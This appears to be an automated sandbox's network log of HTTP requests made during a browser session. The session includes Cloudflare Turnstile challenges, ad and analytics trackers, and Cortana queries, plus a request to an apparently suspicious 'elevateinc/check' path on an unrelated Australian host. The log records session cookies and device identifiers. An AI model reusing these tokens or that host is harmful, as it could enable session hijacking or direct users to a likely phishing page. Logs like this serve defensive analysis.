          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=94baa20e3cecf0c1&lang=auto HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/bzax3/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
          Source: global trafficHTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749241461249&li_adsId=b2f40ce5-83c9-4356-a53c-16d12652f483&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&tm=gtmv2&cookiesTest=true&liSync=true HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=9bd8b1f7-0ad8-4894-8c33-052c74c860f9cookie: UserMatchHistory=AQLhhIFCsaVbnQAAAZdG6oM9hU2OtplHp7GSc4r4jaBnSbgBnMZhjMqfcAhZHCvtNTRN0OcWT9zPSQcookie: AnalyticsSyncHistory=AQIStyol2DqPtwAAAZdG6oM-4N0kwCMGTqb-SBF6hiPCZGhyzwt4pdq7C-MOLWRBddonH8EkwPFZtzhWmoWfBgcookie: ar_debug=1cookie: bcookie="v=2&5581aefa-e85e-4dbb-81ab-f4b4b70cdc28"cookie: lidc="b=TGST09:s=T:r=T:a=T:p=T:g=3045:u=1:x=1:i=1749241464:t=1749327864:v=2:sig=AQEuIxeNVLFgNXFklr6Q0WaZMtr4cKSa"cookie: __cf_bm=EJSLo.NaPBNUZ8IDAkMIutWaX7HcF0vJEfrBaKSH0BM-1749241464-1.0.1.1-Xwezj.WWy6RoWaAzpKSqTZ1wpJfZ6V7d6eMsZHiG250zWBF_ESaKNgAnZtO1FMS6gKWbtiVcGivWMIo1n1zL49UbvisyyZxxius4rfF3gkspriority: i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /ab/elevateinc/check/images/net_big.d-52893f5e.png HTTP/1.1Host: reefe.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749241461249&li_adsId=b2f40ce5-83c9-4356-a53c-16d12652f483&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&tm=gtmv2&cookiesTest=true&liSync=true HTTP/1.1host: px.ads.linkedin.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=9bd8b1f7-0ad8-4894-8c33-052c74c860f9cookie: UserMatchHistory=AQLhhIFCsaVbnQAAAZdG6oM9hU2OtplHp7GSc4r4jaBnSbgBnMZhjMqfcAhZHCvtNTRN0OcWT9zPSQcookie: AnalyticsSyncHistory=AQIStyol2DqPtwAAAZdG6oM-4N0kwCMGTqb-SBF6hiPCZGhyzwt4pdq7C-MOLWRBddonH8EkwPFZtzhWmoWfBgcookie: ar_debug=1cookie: bcookie="v=2&5581aefa-e85e-4dbb-81ab-f4b4b70cdc28"cookie: lidc="b=TGST09:s=T:r=T:a=T:p=T:g=3045:u=1:x=1:i=1749241464:t=1749327864:v=2:sig=AQEuIxeNVLFgNXFklr6Q0WaZMtr4cKSa"cookie: __cf_bm=EJSLo.NaPBNUZ8IDAkMIutWaX7HcF0vJEfrBaKSH0BM-1749241464-1.0.1.1-Xwezj.WWy6RoWaAzpKSqTZ1wpJfZ6V7d6eMsZHiG250zWBF_ESaKNgAnZtO1FMS6gKWbtiVcGivWMIo1n1zL49UbvisyyZxxius4rfF3gkspriority: u=1, i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/94baa202eb60f0c1/1749241463114/a206467c456a016065e707afded2fdd42b17dcfc6109a9d95ec120f9debd2ee0/CqrIFqV2RuTb9J- HTTP/1.1host: challenges.cloudflare.comcache-control: max-age=0sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/tdngb/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/658c478180fccf87132d4798_elevate%20-%20favicon.png HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/898255625:1749238311:8Cbx_g0w1LkNoQTGxDMlteRtPvT6QqEgj3HnY0BLNKg/94baa2087ffef0c1/XF635rvv7mrJbsOB8_7EF5RUF4iFLEATlKmx9YNmPHU-1749241463-1.2.1.1-he0h_DqUGZv049ljbGR.y0S2K1IWP20YYxoaR8.QZt1ntsQ92pnuJMZMrnR.KDXc HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/658c478180fccf87132d4798_elevate%20-%20favicon.png HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=2850574025&v=1.1&a=19524073&rcu=https%3A%2F%2Fwww.elevate.inc%2Four-story&pu=https%3A%2F%2Fwww.elevate.inc%2Four-story&t=Trailblazing+a+better+future+for+benefits+%7C+Our+Story&cts=1749241463446&vi=b4a1f2c849a3a6761ec04b0e89827ff2&nc=true&u=761582.b4a1f2c849a3a6761ec04b0e89827ff2.1749241463442.1749241463442.1749241463442.1&b=761582.1.1749241463442&cc=15 HTTP/1.1host: track.hubspot.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
          Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff2 HTTP/1.1host: cdnjs.cloudflare.comorigin: https://reefe.com.ausec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://reefe.com.au/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
          Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1host: c.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94baa202eb60f0c1/1749241463115/wSuiln0GmvG_Q-Q HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/tdngb/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94baa202eb60f0c1/1749241463115/wSuiln0GmvG_Q-Q HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94baa2087ffef0c1/1749241464928/331hSKYOwVc0UTy HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/qmf0x/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/632828409:1749238260:YkmVF3X5J5_athNRR074_EHXD5u40NZ6Z8MHUkqcQ3E/94baa20e3cecf0c1/NIQsqHERHQt5yKIBs0hX1Bdfyh0HcTdgo3uXz70FrEI-1749241464-1.2.1.1-DBJXvRt2Er82p9GSsQk6u65JwBRWdFL1SLUBMEE4S3nLQL9zLv9MbkJVmAotX1it HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94baa2087ffef0c1/1749241464928/331hSKYOwVc0UTy HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=2850574025&v=1.1&a=19524073&rcu=https%3A%2F%2Fwww.elevate.inc%2Four-story&pu=https%3A%2F%2Fwww.elevate.inc%2Four-story&t=Trailblazing+a+better+future+for+benefits+%7C+Our+Story&cts=1749241463446&vi=b4a1f2c849a3a6761ec04b0e89827ff2&nc=true&u=761582.b4a1f2c849a3a6761ec04b0e89827ff2.1749241463442.1749241463442.1749241463442.1&b=761582.1.1749241463442&cc=15 HTTP/1.1host: track.hubspot.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: __cf_bm=I19u5jAwDaRjp9BnzeMuWP_QARQgLEFfjg4cfTLOcZU-1749241465-1.0.1.1-TU0IG9sPZcEaDiaW.6NmD6GJuMdheht0mBrzWIGSeTU4Og2eR1AZ3U5Ct2msIV1llwiMGD5N02XQF.MivKUrzxyCsVsrf7a1eDrPIU8RN1wcookie: _cfuvid=lmi3opIW_NLAin9uV3D9Fsgi1REcSWzbckybOdIrIkY-1749241465471-0.0.1.1-604800000priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=A482E2804257473C9458BEA2135D9AEB&RedC=c.clarity.ms&MXFR=3106F704ED6467A71AB9E107E9646901 HTTP/1.1host: c.bing.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
          Source: global trafficHTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=A482E2804257473C9458BEA2135D9AEB&MUID=2CA12B03473A6CA81B2B3D00461F6D39 HTTP/1.1host: c.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: SM=Tcookie: MUID=3106F704ED6467A71AB9E107E9646901priority: i
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=efHf3EnMDEXDW81&MD=nxOpV6m7 HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
          Source: global trafficHTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=A482E2804257473C9458BEA2135D9AEB&MUID=2CA12B03473A6CA81B2B3D00461F6D39 HTTP/1.1host: c.clarity.msuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: SM=Ccookie: MUID=2CA12B03473A6CA81B2B3D00461F6D39cookie: MR=0cookie: ANONCHK=0priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=po&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=af41f482fd644dc08e178ad70ac98253&ig=7f023d851b1c4a10b88ee1a393219c43 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-
          Source: global trafficHTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=402439e4&IPMID=1741339336144&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=pow&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=af41f482fd644dc08e178ad70ac98253&ig=0f0639c2c361419eb32d978828c89573 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powe&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=4&cvid=af41f482fd644dc08e178ad70ac98253&ig=39c4927accfc452f8eb9636a255ac733 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: None
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/94baa2087ffef0c1/1749241464929/092ead6ac078a557d6ec4fb744e724831241d779953467629f931f9980f92567/b1FwOs4EXA2UCfN HTTP/1.1host: challenges.cloudflare.comcache-control: max-age=0sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/qmf0x/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=power&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=5&cvid=af41f482fd644dc08e178ad70ac98253&ig=a4ad7baebaa74ff191f5c2b6cf3f1817 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: None
